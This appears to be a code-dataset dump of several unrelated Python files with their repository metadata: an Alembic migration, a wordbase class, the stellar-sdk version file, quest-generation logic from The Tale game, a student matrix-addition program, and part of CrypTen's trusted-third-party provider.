sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.String(length=128), nullable=False),
sa.Column("name", sa.String(length=128), nullable=True),
sa.Column("data_block_id", sa.String(length=128), nullable=False),
sa.Column("storage_url", sa.String(length=128), nullable=False),
sa.Column(
"data_format",
snapflow.core.metadata.orm.DataFormatType(length=128),
nullable=False,
),
sa.ForeignKeyConstraint(
["data_block_id"],
["_snapflow_data_block_metadata.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_alias",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("name", sa.String(length=128), nullable=True),
sa.Column("data_block_id", sa.String(length=128), nullable=False),
sa.Column("stored_data_block_id", sa.String(length=128), nullable=False),
sa.ForeignKeyConstraint(
["data_block_id"],
["_snapflow_data_block_metadata.id"],
),
sa.ForeignKeyConstraint(
["stored_data_block_id"],
["_snapflow_stored_data_block_metadata.id"],
),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("env_id", "name"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("_snapflow_alias")
op.drop_table("_snapflow_stored_data_block_metadata")
op.drop_table("_snapflow_data_block_log")
op.drop_table("_snapflow_node_state")
op.drop_table("_snapflow_generated_schema")
op.drop_table("_snapflow_data_function_log")
op.drop_table("_snapflow_data_block_metadata")
# ### end Alembic commands ###
| [
"[email protected]"
]
| |
867c39b81f0bd2f14694cd585a733a351b7c50fa | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_spinier.py | 0482c9921fbb9ca2d0ffe46b31b1181f2f50e5f1 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py |
from xai.brain.wordbase.adjectives._spiny import _SPINY
#calss header
class _SPINIER(_SPINY, ):
def __init__(self,):
_SPINY.__init__(self)
self.name = "SPINIER"
self.specie = 'adjectives'
self.basic = "spiny"
self.jsondata = {}
| [
"[email protected]"
]
| |
00a109d7ceb3af65458a2708817bd3fcbd90c405 | 38f19ae4963df9be7a851458e63ffb94d824eb03 | /stellar_sdk/__version__.py | 328854e119791d65c471bc64c026b784c86512b9 | [
"Apache-2.0"
]
| permissive | brunodabo/py-stellar-base | e033da687e3a2a76076cfed88e82c7951ae4e57e | 7897a23bc426324cb389a7cdeb695dfce10a673f | refs/heads/master | 2022-11-05T12:35:37.140735 | 2020-06-03T13:41:30 | 2020-06-03T13:54:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | """
_____ _______ ______ _ _ _____ _____ _____ _ __
/ ____|__ __| ____| | | | /\ | __ \ / ____| __ \| |/ /
| (___ | | | |__ | | | | / \ | |__) |____| (___ | | | | ' /
\___ \ | | | __| | | | | / /\ \ | _ /______\___ \| | | | <
____) | | | | |____| |____| |____ / ____ \| | \ \ ____) | |__| | . \
|_____/ |_| |______|______|______/_/ \_\_| \_\ |_____/|_____/|_|\_\
"""
__title__ = "stellar-sdk"
__description__ = "The Python Stellar SDK library provides APIs to build transactions and connect to Horizon."
__url__ = "https://github.com/StellarCN/py-stellar-base"
__issues__ = "{}/issues".format(__url__)
__version__ = "2.5.2"
__author__ = "Eno, overcat"
__author_email__ = "[email protected], [email protected]"
__license__ = "Apache License 2.0"
| [
"[email protected]"
]
| |
5440c399fc472d9aec6c0adc203267a050e8c7d0 | 747febe786dd6b7fd6c63cfe73dbe3023354daa8 | /src/the_tale/the_tale/game/quests/logic.py | 69a11b9a515ce9d1b4452b825829a94900ea8fa3 | [
"BSD-3-Clause"
]
| permissive | the-tale/the-tale | 4e4b8d91dc873a5fb935fe58e9721a877baa6d3f | e8450bd2332344da805b1851e728da5a3e5bf0ef | refs/heads/develop | 2023-08-01T13:53:46.835667 | 2022-12-25T18:04:56 | 2022-12-25T18:04:56 | 1,949,167 | 98 | 52 | BSD-3-Clause | 2023-02-15T18:57:33 | 2011-06-24T18:49:48 | Python | UTF-8 | Python | false | false | 27,529 | py |
import smart_imports
smart_imports.all()
WORLD_RESTRICTIONS = [questgen_restrictions.SingleLocationForObject(),
questgen_restrictions.ReferencesIntegrity()]
QUEST_RESTRICTIONS = [questgen_restrictions.SingleStartStateWithNoEnters(),
questgen_restrictions.FinishStateExists(),
questgen_restrictions.AllStatesHasJumps(),
questgen_restrictions.ConnectedStateJumpGraph(),
questgen_restrictions.NoCirclesInStateJumpGraph(),
questgen_restrictions.MultipleJumpsFromNormalState(),
questgen_restrictions.ChoicesConsistency(),
questgen_restrictions.QuestionsConsistency(),
questgen_restrictions.FinishResultsConsistency()]
QUESTS_BASE = questgen_quests_quests_base.QuestsBase()
QUESTS_BASE += [quest.quest_class for quest in relations.QUESTS.records]
class HeroQuestInfo(object):
__slots__ = ('id',
'level',
'position_place_id',
'is_first_quest_path_required',
'preferences_mob_id',
'preferences_place_id',
'preferences_friend_id',
'preferences_enemy_id',
'preferences_equipment_slot',
'preferences_quests_region_id',
'preferences_quests_region_size',
'interfered_persons',
'quests_priorities',
'excluded_quests',
'prefered_quest_markers')
def __init__(self,
id,
level,
position_place_id,
is_first_quest_path_required,
preferences_mob_id,
preferences_place_id,
preferences_friend_id,
preferences_enemy_id,
preferences_equipment_slot,
preferences_quests_region_id,
preferences_quests_region_size,
interfered_persons,
quests_priorities,
excluded_quests,
prefered_quest_markers):
self.id = id
self.level = level
self.position_place_id = position_place_id
self.is_first_quest_path_required = is_first_quest_path_required
self.preferences_mob_id = preferences_mob_id
self.preferences_place_id = preferences_place_id
self.preferences_friend_id = preferences_friend_id
self.preferences_enemy_id = preferences_enemy_id
self.preferences_equipment_slot = preferences_equipment_slot
self.preferences_quests_region_id = preferences_quests_region_id
self.preferences_quests_region_size = preferences_quests_region_size
self.interfered_persons = interfered_persons
self.quests_priorities = quests_priorities
self.excluded_quests = excluded_quests
self.prefered_quest_markers = prefered_quest_markers
@property
def position_place(self):
return places_storage.places[self.position_place_id]
def serialize(self):
return {'id': self.id,
'level': self.level,
'position_place_id': self.position_place_id,
'is_first_quest_path_required': self.is_first_quest_path_required,
'preferences_mob_id': self.preferences_mob_id,
'preferences_place_id': self.preferences_place_id,
'preferences_friend_id': self.preferences_friend_id,
'preferences_enemy_id': self.preferences_enemy_id,
'preferences_equipment_slot': self.preferences_equipment_slot.value if self.preferences_equipment_slot else None,
'preferences_quests_region_id': self.preferences_quests_region_id if self.preferences_quests_region_id else None,
'preferences_quests_region_size': self.preferences_quests_region_size,
'interfered_persons': self.interfered_persons,
'quests_priorities': [(quest_type.value, priority) for quest_type, priority in self.quests_priorities],
'excluded_quests': list(sorted(self.excluded_quests)),
'prefered_quest_markers': list(sorted(self.prefered_quest_markers))}
@classmethod
def deserialize(cls, data):
return cls(id=data['id'],
level=data['level'],
position_place_id=data['position_place_id'],
is_first_quest_path_required=data['is_first_quest_path_required'],
preferences_mob_id=data['preferences_mob_id'],
preferences_place_id=data['preferences_place_id'],
preferences_friend_id=data['preferences_friend_id'],
preferences_enemy_id=data['preferences_enemy_id'],
preferences_equipment_slot=heroes_relations.EQUIPMENT_SLOT(data['preferences_equipment_slot']) if data['preferences_equipment_slot'] is not None else None,
preferences_quests_region_id=data['preferences_quests_region_id'],
preferences_quests_region_size=data['preferences_quests_region_size'],
interfered_persons=data['interfered_persons'],
quests_priorities=[(relations.QUESTS(quest_type), priority) for quest_type, priority in data['quests_priorities']],
excluded_quests=set(data['excluded_quests']),
prefered_quest_markers=set(data['prefered_quest_markers']))
def __eq__(self, other):
return self.serialize() == other.serialize()
def __neq__(self, other):
return not self.__eq__(other)
def choose_quest_path_url():
return utils_urls.url('game:quests:api-choose', api_version='1.0', api_client=django_settings.API_CLIENT)
def fact_place(place):
return questgen_facts.Place(uid=uids.place(place.id),
terrains=[terrain.value for terrain in map_storage.cells.place_terrains(place.id)],
externals={'id': place.id},
type=place.modifier_quest_type())
def fact_mob(mob):
return questgen_facts.Mob(uid=uids.mob(mob.id),
terrains=[terrain.value for terrain in mob.terrains],
externals={'id': mob.id})
def fact_person(person):
return questgen_facts.Person(uid=uids.person(person.id),
profession=person.type.quest_profession,
externals={'id': person.id,
'type': game_relations.ACTOR.PERSON.value})
def fact_emissary(emissary):
return questgen_facts.Person(uid=uids.emissary(emissary.id),
profession=None,
externals={'id': emissary.id,
'type': game_relations.ACTOR.EMISSARY.value})
def fact_social_connection(connection_type, person_uid, connected_person_uid):
return questgen_facts.SocialConnection(person_to=person_uid,
person_from=connected_person_uid,
type=connection_type.questgen_type)
def fact_located_in(person):
return questgen_facts.LocatedIn(object=uids.person(person.id), place=uids.place(person.place.id))
def fill_places(kb, places):
for place in places:
uid = uids.place(place.id)
if uid in kb:
continue
kb += fact_place(place)
def setup_places(kb, hero_info):
center_place_id = hero_info.position_place_id
quests_region_size = hero_info.preferences_quests_region_size
if hero_info.preferences_quests_region_id is not None:
center_place_id = hero_info.preferences_quests_region_id
if hero_info.is_first_quest_path_required:
quests_region_size = 2
places = places_storage.places.nearest_places(center_place_id,
number=quests_region_size)
if len(places) < 2:
places = places_storage.places.all()
fill_places(kb, places)
hero_position_uid = uids.place(hero_info.position_place_id)
if hero_position_uid not in kb:
kb += fact_place(places_storage.places[hero_info.position_place_id])
kb += questgen_facts.LocatedIn(object=uids.hero(hero_info.id), place=hero_position_uid)
def setup_person(kb, person):
if uids.place(person.place.id) not in kb:
kb += fact_place(person.place)
person_uid = uids.person(person.id)
if person_uid in kb:
return kb[person_uid]
f_person = fact_person(person)
kb += f_person
kb += fact_located_in(person)
return f_person
def setup_persons(kb, hero_info):
for person in persons_storage.persons.all():
if uids.place(person.place.id) not in kb:
continue
setup_person(kb, person)
def setup_social_connections(kb):
persons_in_kb = {f_person.externals['id']: f_person.uid
for f_person in kb.filter(questgen_facts.Person)
if f_person.externals['type'] == game_relations.ACTOR.PERSON.value}
for person_id, person_uid in persons_in_kb.items():
person = persons_storage.persons[person_id]
for connection_type, connected_person_id in persons_storage.social_connections.get_person_connections(person):
if connected_person_id not in persons_in_kb:
continue
kb += fact_social_connection(connection_type, person_uid, persons_in_kb[connected_person_id])
def setup_preferences(kb, hero_info):
hero_uid = uids.hero(hero_info.id)
if hero_info.preferences_mob_id is not None:
f_mob = fact_mob(mobs_storage.mobs[hero_info.preferences_mob_id])
if f_mob.uid not in kb:
kb += f_mob
kb += questgen_facts.PreferenceMob(object=hero_uid, mob=f_mob.uid)
if hero_info.preferences_place_id is not None:
f_place = fact_place(places_storage.places[hero_info.preferences_place_id])
if f_place.uid not in kb:
kb += f_place
kb += questgen_facts.PreferenceHometown(object=hero_uid, place=f_place.uid)
if hero_info.preferences_friend_id is not None:
friend = persons_storage.persons[hero_info.preferences_friend_id]
f_person = setup_person(kb, friend)
kb += questgen_facts.PreferenceFriend(object=hero_uid, person=f_person.uid)
kb += questgen_facts.ExceptBadBranches(object=f_person.uid)
if hero_info.preferences_enemy_id:
enemy = persons_storage.persons[hero_info.preferences_enemy_id]
f_person = setup_person(kb, enemy)
kb += questgen_facts.PreferenceEnemy(object=hero_uid, person=f_person.uid)
kb += questgen_facts.ExceptGoodBranches(object=f_person.uid)
if hero_info.preferences_equipment_slot:
kb += questgen_facts.PreferenceEquipmentSlot(object=hero_uid, equipment_slot=hero_info.preferences_equipment_slot.value)
def get_knowledge_base(hero_info, without_restrictions=False): # pylint: disable=R0912
kb = questgen_knowledge_base.KnowledgeBase()
hero_uid = uids.hero(hero_info.id)
kb += questgen_facts.Hero(uid=hero_uid, externals={'id': hero_info.id})
setup_places(kb, hero_info)
setup_persons(kb, hero_info)
setup_preferences(kb, hero_info)
setup_social_connections(kb)
if not without_restrictions:
for person in persons_storage.persons.all():
if person.place.id == hero_info.position_place_id and person.id in hero_info.interfered_persons:
kb += questgen_facts.NotFirstInitiator(person=uids.person(person.id))
kb.validate_consistency(WORLD_RESTRICTIONS)
kb += [questgen_facts.UpgradeEquipmentCost(money=prototypes.QuestPrototype.upgrade_equipment_cost(hero_info))]
return kb
def create_random_quest_for_hero(hero_info, logger):
constructor = place_quest_constructor_fabric(place=hero_info.position_place,
person_action=None)
return create_random_quest_with_constructor(hero_info,
constructor,
logger,
excluded_quests=hero_info.excluded_quests,
no_restrictions_on_fail=True)
def create_random_quest_for_place(hero_info, place, person_action, logger):
constructor = place_quest_constructor_fabric(place=place,
person_action=person_action)
excluded_quests = [record.quest_class.TYPE
for record in relations.QUESTS.records
if not record.allowed_for_cards]
return create_random_quest_with_constructor(hero_info,
constructor,
logger,
excluded_quests=excluded_quests,
no_restrictions_on_fail=False)
def create_random_quest_for_person(hero_info, person, person_action, logger):
constructor = person_quest_constructor_fabric(person=person,
person_action=person_action)
excluded_quests = [record.quest_class.TYPE
for record in relations.QUESTS.records
if not record.allowed_for_cards]
return create_random_quest_with_constructor(hero_info,
constructor,
logger,
excluded_quests=excluded_quests,
no_restrictions_on_fail=False)
def create_random_quest_for_emissary(hero_info, emissary, person_action, logger):
constructor = emissary_quest_constructor_fabric(emissary=emissary,
person_action=person_action)
excluded_quests = [record.quest_class.TYPE
for record in relations.QUESTS.records
if not record.allowed_for_cards]
return create_random_quest_with_constructor(hero_info,
constructor,
logger,
excluded_quests=excluded_quests,
no_restrictions_on_fail=False)
def create_random_quest_with_constructor(hero_info, constructor, logger, excluded_quests, no_restrictions_on_fail):
start_time = time.time()
normal_mode = True
quests = utils_logic.shuffle_values_by_priority(hero_info.quests_priorities)
logger.info('hero[%(hero_id).6d]: try is_normal: %(is_normal)s (allowed: %(allowed)s) (excluded: %(excluded)s)' %
{'hero_id': hero_info.id,
'is_normal': normal_mode,
'allowed': ', '.join(quest.quest_class.TYPE for quest in quests),
'excluded': ', '.join(excluded_quests)})
quest_type, knowledge_base = try_to_create_random_quest_for_hero(hero_info,
quests,
excluded_quests,
without_restrictions=False,
constructor=constructor,
logger=logger)
if knowledge_base is None and no_restrictions_on_fail:
logger.info('hero[%(hero_id).6d]: first try failed' % {'hero_id': hero_info.id})
normal_mode = False
quest_type, knowledge_base = try_to_create_random_quest_for_hero(hero_info,
quests,
excluded_quests=[],
without_restrictions=True,
constructor=constructor,
logger=logger)
spent_time = time.time() - start_time
logger.info('hero[%(hero_id).6d]: %(spent_time)s is_normal: %(is_normal)s %(quest_type)20s (allowed: %(allowed)s) (excluded: %(excluded)s)' %
{'hero_id': hero_info.id,
'spent_time': spent_time,
'is_normal': normal_mode,
'quest_type': quest_type,
'allowed': ', '.join(quest.quest_class.TYPE for quest in quests),
'excluded': ', '.join(excluded_quests)})
return knowledge_base
def try_to_create_random_quest_for_hero(hero_info, quests, excluded_quests, without_restrictions, constructor, logger):
for quest_type in quests:
if quest_type.quest_class.TYPE in excluded_quests:
continue
try:
return quest_type, _create_random_quest_for_hero(hero_info,
constructor=constructor,
start_quests=[quest_type.quest_class.TYPE],
without_restrictions=without_restrictions)
except questgen_exceptions.RollBackError as e:
logger.info('hero[%(hero_id).6d]: can not create quest <%(quest_type)s>: %(exception)s' %
{'hero_id': hero_info.id,
'quest_type': quest_type,
'exception': e})
continue
return None, None
@utils_decorators.retry_on_exception(max_retries=conf.settings.MAX_QUEST_GENERATION_RETRIES,
exceptions=[questgen_exceptions.RollBackError])
def _create_random_quest_for_hero(hero_info, constructor, start_quests, without_restrictions=False):
knowledge_base = get_knowledge_base(hero_info, without_restrictions=without_restrictions)
selector = questgen_selectors.Selector(knowledge_base, QUESTS_BASE, social_connection_probability=0)
knowledge_base += constructor(selector, start_quests)
questgen_transformators.activate_events(knowledge_base) # TODO: after remove restricted states
questgen_transformators.remove_restricted_states(knowledge_base)
questgen_transformators.remove_broken_states(knowledge_base) # MUST be called after all graph changes
questgen_transformators.determine_default_choices(knowledge_base, preferred_markers=hero_info.prefered_quest_markers) # MUST be called after all graph changes and on valid graph
questgen_transformators.remove_unused_actors(knowledge_base)
knowledge_base.validate_consistency(WORLD_RESTRICTIONS)
knowledge_base.validate_consistency(QUEST_RESTRICTIONS)
return knowledge_base
def place_quest_constructor_fabric(place, person_action):
def constructor(selector, start_quests):
f_place = fact_place(place)
if f_place.uid not in selector._kb:
selector._kb += f_place
if person_action is not None:
if person_action.is_HELP:
selector._kb += questgen_facts.OnlyGoodBranches(object=f_place.uid)
elif person_action.is_HARM:
selector._kb += questgen_facts.OnlyBadBranches(object=f_place.uid)
for person in place.persons:
f_person = setup_person(selector._kb, person)
if person_action.is_HELP:
remove_help_restrictions(selector._kb, f_person.uid, f_place.uid)
selector._kb += questgen_facts.OnlyGoodBranches(object=f_person.uid)
elif person_action.is_HARM:
remove_harm_restrictions(selector._kb, f_person.uid, f_place.uid)
selector._kb += questgen_facts.OnlyBadBranches(object=f_person.uid)
selector.reserve(f_place)
return selector.create_quest_from_place(nesting=0,
initiator_position=f_place,
allowed=start_quests,
excluded=[],
tags=('can_start', ))
return constructor
def emissary_quest_constructor_fabric(emissary, person_action):
def constructor(selector, start_quests):
f_emissary = fact_emissary(emissary)
f_emissary_place = fact_place(emissary.place)
selector._kb += f_emissary
selector._kb += questgen_facts.LocatedIn(object=f_emissary.uid, place=uids.place(emissary.place_id))
if f_emissary_place.uid not in selector._kb:
selector._kb += f_emissary_place
if person_action.is_HELP:
remove_help_restrictions(selector._kb, f_emissary.uid, f_emissary_place.uid)
selector._kb += questgen_facts.OnlyGoodBranches(object=f_emissary.uid)
elif person_action.is_HARM:
remove_harm_restrictions(selector._kb, f_emissary.uid, f_emissary_place.uid)
selector._kb += questgen_facts.OnlyBadBranches(object=f_emissary.uid)
else:
raise NotImplementedError
selector.reserve(f_emissary)
selector.reserve(f_emissary_place)
return selector.create_quest_from_person(nesting=0,
initiator=f_emissary,
allowed=start_quests,
excluded=[],
tags=('can_start', ))
return constructor
def remove_restrictions(kb, Fact, object_uid):
to_remove = []
for fact in kb.filter(Fact):
if fact.object == object_uid:
to_remove.append(fact)
kb -= to_remove
def remove_help_restrictions(kb, person_uid, place_uid):
remove_restrictions(kb, questgen_facts.OnlyBadBranches, place_uid)
remove_restrictions(kb, questgen_facts.ExceptGoodBranches, place_uid)
remove_restrictions(kb, questgen_facts.OnlyBadBranches, person_uid)
remove_restrictions(kb, questgen_facts.ExceptGoodBranches, person_uid)
def remove_harm_restrictions(kb, person_uid, place_uid):
remove_restrictions(kb, questgen_facts.OnlyGoodBranches, place_uid)
remove_restrictions(kb, questgen_facts.ExceptBadBranches, place_uid)
remove_restrictions(kb, questgen_facts.OnlyGoodBranches, person_uid)
remove_restrictions(kb, questgen_facts.ExceptBadBranches, person_uid)
def person_quest_constructor_fabric(person, person_action):
def constructor(selector, start_quests):
place_uid = uids.place(person.place_id)
f_person = setup_person(selector._kb, person)
if person_action.is_HELP:
remove_help_restrictions(selector._kb, f_person.uid, place_uid)
selector._kb += questgen_facts.OnlyGoodBranches(object=f_person.uid)
elif person_action.is_HARM:
remove_harm_restrictions(selector._kb, f_person.uid, place_uid)
selector._kb += questgen_facts.OnlyBadBranches(object=f_person.uid)
else:
raise NotImplementedError
selector.reserve(f_person)
selector.reserve(selector._kb[place_uid])
return selector.create_quest_from_person(nesting=0,
initiator=f_person,
allowed=start_quests,
excluded=[],
tags=('can_start', ))
return constructor
def create_hero_info(hero):
quests_priorities = hero.get_quests_priorities()
return HeroQuestInfo(id=hero.id,
level=hero.level,
position_place_id=hero.position.cell().nearest_place_id,
is_first_quest_path_required=hero.is_first_quest_path_required,
preferences_mob_id=hero.preferences.mob.id if hero.preferences.mob else None,
preferences_place_id=hero.preferences.place.id if hero.preferences.place else None,
preferences_friend_id=hero.preferences.friend.id if hero.preferences.friend else None,
preferences_enemy_id=hero.preferences.enemy.id if hero.preferences.enemy else None,
preferences_equipment_slot=hero.preferences.equipment_slot,
preferences_quests_region_id=hero.preferences.quests_region.id if hero.preferences.quests_region else None,
preferences_quests_region_size=hero.preferences.quests_region_size,
interfered_persons=hero.quests.get_interfered_persons(),
quests_priorities=quests_priorities,
excluded_quests=hero.quests.excluded_quests(len(quests_priorities) // 2),
prefered_quest_markers=hero.prefered_quest_markers())
def request_quest_for_hero(hero, emissary_id=None, place_id=None, person_id=None, person_action=None):
hero_info = create_hero_info(hero)
amqp_environment.environment.workers.quests_generator.cmd_request_quest(hero.account_id,
hero_info.serialize(),
emissary_id=emissary_id,
place_id=place_id,
person_id=person_id,
person_action=person_action)
def setup_quest_for_hero(hero, knowledge_base_data):
# do nothing if hero has already had quest
if not hero.actions.current_action.searching_quest:
return
knowledge_base = questgen_knowledge_base.KnowledgeBase.deserialize(knowledge_base_data, fact_classes=questgen_facts.FACTS)
states_to_percents = questgen_analysers.percents_collector(knowledge_base)
quest = prototypes.QuestPrototype(hero=hero, knowledge_base=knowledge_base, states_to_percents=states_to_percents)
# устанавливаем квест перед его началом,
# чтобы он корректно записался в стек
hero.actions.current_action.setup_quest(quest)
if quest.machine.can_do_step():
quest.machine.step() # do first step to setup pointer
# заставляем героя выполнить условия стартового узла задания
# необходимо для случая, когда квест инициирует игрок и героя не находится в точке начала задания
quest.machine.check_requirements(quest.machine.current_state)
quest.machine.satisfy_requirements(quest.machine.current_state)
def extract_person_type(fact):
return game_relations.ACTOR(fact.externals.get('type', game_relations.ACTOR.PERSON.value))
| [
"[email protected]"
]
| |
ceb03e78d5da369eaa15cfadb539d06f2ad3979b | c3e2f56672e01590dc7dc7e184f30c2884ce5d3a | /Programs/MyPythonXII/Unit1/PyChap03/summatrix.py | a00722d07d1ce3b80baa6858b737eb411c6ad68e | []
| no_license | mridulrb/Basic-Python-Examples-for-Beginners | ef47e830f3cc21cee203de2a7720c7b34690e3e1 | 86b0c488de4b23b34f7424f25097afe1874222bd | refs/heads/main | 2023-01-04T09:38:35.444130 | 2020-10-18T15:59:29 | 2020-10-18T15:59:29 | 305,129,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,941 | py | # File name: ...\\MyPythonXII\Unit1\PyChap03\summatrix.py
# Program to add two matrices
# Declaration of three 10 x 10 matrices
A = [[0 for x in range(10)] for x in range(10)]
B = [[0 for x in range(10)] for x in range(10)]
C = [[0 for x in range(10)] for x in range(10)]
print("Enter the number of Rows of matrix A: ", end='')
r = int(input())
print("Enter the number of Columns of matrix A: ", end='')
c = int(input())
print("Enter the number of Rows of matrix B: ", end='')
r1 = int(input())
print("Enter the number of Columns of matrix B: ", end='')
c1 = int(input())
# Before accepting the Elements Check if no of
# rows and columns of both matrices is equal
if (r == r1 and c == c1):
# Accept the Elements for matrix A
for i in range(r):
for j in range(c):
print("Enter the element A[%d][%d]: " % (i, j), end='')
A[i][j] = int(input())
# Accept the Elements for matrix B
for i in range(r):
for j in range(c):
print("Enter the element B[%d][%d]: " % (i, j), end='')
B[i][j] = int(input())
# Addition of two matrices
for i in range(r):
for j in range(c):
C[i][j] = A[i][j] + B[i][j]
# First matrix
print("Matrix A:")
for i in range(r):
print(" "*5, end="")
for j in range(c):
print("{0:^3}".format(A[i][j]), end=' ')
print()
print("Matrix B:")
for i in range(r):
print(" "*5, end="")
for j in range(c):
print("{0:^3}".format(B[i][j]), end=' ')
print()
# Print out the Resultant Matrix C
print("The Addition of two Matrices C is : ")
for i in range(r):
print(" "*5, end="")
for j in range(c):
print ("{0:^3}".format(C[i][j]), end=' ')
print()
else:
print("Order of two matrices is not same ")
| [
"[email protected]"
]
| |
97b8958344299980760e8949312f7387d6e8b9ae | 49eba6a6d52b46171d88adc87cd2f761c0eb90d4 | /crypten/mpc/provider/ttp_provider.py | e3a09ac97d52be242b3c1ecc03184acbe8da7d7b | [
"MIT"
]
| permissive | tnpe/CrypTen | 8bfc07556df2b497214a4b32c11eb180f62e45dd | 6a06dc8cd52200f40a9fc520be0066bd0dea6b14 | refs/heads/master | 2023-02-26T10:15:39.729336 | 2021-01-20T14:54:29 | 2021-01-20T14:56:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,063 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
from functools import reduce
import crypten
import crypten.communicator as comm
import torch
import torch.distributed as dist
from crypten.common.rng import generate_kbit_random_tensor, generate_random_ring_element
from crypten.common.util import count_wraps, torch_stack
from crypten.mpc.primitives import ArithmeticSharedTensor, BinarySharedTensor
TTP_FUNCTIONS = ["additive", "square", "binary", "wraps", "B2A"]
class TrustedThirdParty:
NAME = "TTP"
@staticmethod
def generate_additive_triple(size0, size1, op, device=None, *args, **kwargs):
"""Generate multiplicative triples of given sizes"""
generator = TTPClient.get().get_generator(device=device)
a = generate_random_ring_element(size0, generator=generator, device=device)
b = generate_random_ring_element(size1, generator=generator, device=device)
if comm.get().get_rank() == 0:
# Request c from TTP
c = TTPClient.get().ttp_request(
"additive", device, size0, size1, op, *args, **kwargs
)
else:
# TODO: Compute size without executing computation
c_size = getattr(torch, op)(a, b, *args, **kwargs).size()
c = generate_random_ring_element(c_size, generator=generator, device=device)
a = ArithmeticSharedTensor.from_shares(a, precision=0)
b = ArithmeticSharedTensor.from_shares(b, precision=0)
c = ArithmeticSharedTensor.from_shares(c, precision=0)
return a, b, c
@staticmethod
def square(size, device=None):
"""Generate square double of given size"""
generator = TTPClient.get().get_generator(device=device)
r = generate_random_ring_element(size, generator=generator, device=device)
if comm.get().get_rank() == 0:
# Request r2 from TTP
r2 = TTPClient.get().ttp_request("square", device, size)
else:
r2 = generate_random_ring_element(size, generator=generator, device=device)
r = ArithmeticSharedTensor.from_shares(r, precision=0)
r2 = ArithmeticSharedTensor.from_shares(r2, precision=0)
return r, r2
@staticmethod
def generate_binary_triple(size0, size1, device=None):
"""Generate binary triples of given size"""
generator = TTPClient.get().get_generator(device=device)
a = generate_kbit_random_tensor(size0, generator=generator, device=device)
b = generate_kbit_random_tensor(size1, generator=generator, device=device)
if comm.get().get_rank() == 0:
# Request c from TTP
c = TTPClient.get().ttp_request("binary", device, size0, size1)
else:
size2 = torch.broadcast_tensors(a, b)[0].size()
c = generate_kbit_random_tensor(size2, generator=generator, device=device)
# Stack to vectorize scatter function
a = BinarySharedTensor.from_shares(a)
b = BinarySharedTensor.from_shares(b)
c = BinarySharedTensor.from_shares(c)
return a, b, c
@staticmethod
def wrap_rng(size, device=None):
"""Generate random shared tensor of given size and sharing of its wraps"""
generator = TTPClient.get().get_generator(device=device)
r = generate_random_ring_element(size, generator=generator, device=device)
if comm.get().get_rank() == 0:
# Request theta_r from TTP
theta_r = TTPClient.get().ttp_request("wraps", device, size)
else:
theta_r = generate_random_ring_element(
size, generator=generator, device=device
)
r = ArithmeticSharedTensor.from_shares(r, precision=0)
theta_r = ArithmeticSharedTensor.from_shares(theta_r, precision=0)
return r, theta_r
@staticmethod
def B2A_rng(size, device=None):
"""Generate random bit tensor as arithmetic and binary shared tensors"""
generator = TTPClient.get().get_generator(device=device)
# generate random bit
rB = generate_kbit_random_tensor(
size, bitlength=1, generator=generator, device=device
)
if comm.get().get_rank() == 0:
# Request rA from TTP
rA = TTPClient.get().ttp_request("B2A", device, size)
else:
rA = generate_random_ring_element(size, generator=generator, device=device)
rA = ArithmeticSharedTensor.from_shares(rA, precision=0)
rB = BinarySharedTensor.from_shares(rB)
return rA, rB
@staticmethod
def rand(*sizes, encoder=None, device=None):
"""Generate random ArithmeticSharedTensor uniform on [0, 1]"""
generator = TTPClient.get().get_generator(device=device)
if isinstance(sizes, torch.Size):
sizes = tuple(sizes)
if isinstance(sizes[0], torch.Size):
sizes = tuple(sizes[0])
if comm.get().get_rank() == 0:
# Request samples from TTP
samples = TTPClient.get().ttp_request(
"rand", device, *sizes, encoder=encoder
)
else:
samples = generate_random_ring_element(
sizes, generator=generator, device=device
)
return ArithmeticSharedTensor.from_shares(samples)
@staticmethod
def _init():
TTPClient._init()
@staticmethod
def uninit():
TTPClient.uninit()
class TTPClient:
__instance = None
class __TTPClient:
"""Singleton class"""
def __init__(self):
# Initialize connection
self.ttp_group = comm.get().ttp_group
self.comm_group = comm.get().ttp_comm_group
self._setup_generators()
logging.info(f"TTPClient {comm.get().get_rank()} initialized")
def _setup_generators(self):
seed = torch.empty(size=(), dtype=torch.long)
dist.irecv(
tensor=seed, src=comm.get().get_ttp_rank(), group=self.ttp_group
).wait()
dist.barrier(group=self.ttp_group)
self.generator = torch.Generator(device="cpu")
self.generator_cuda = torch.Generator(device="cuda")
self.generator.manual_seed(seed.item())
self.generator_cuda.manual_seed(seed.item())
def get_generator(self, device=None):
if device is None:
device = "cpu"
device = torch.device(device)
if device.type == "cuda":
return self.generator_cuda
else:
return self.generator
def ttp_request(self, func_name, device, *args, **kwargs):
assert (
comm.get().get_rank() == 0
), "Only party 0 communicates with the TTPServer"
if device is not None:
device = str(device)
message = {
"function": func_name,
"device": device,
"args": args,
"kwargs": kwargs,
}
ttp_rank = comm.get().get_ttp_rank()
comm.get().send_obj(message, ttp_rank, self.ttp_group)
size = comm.get().recv_obj(ttp_rank, self.ttp_group)
result = torch.empty(size, dtype=torch.long, device=device)
comm.get().broadcast(result, ttp_rank, self.comm_group)
return result
@staticmethod
def _init():
"""Initializes a Trusted Third Party client that sends requests"""
if TTPClient.__instance is None:
TTPClient.__instance = TTPClient.__TTPClient()
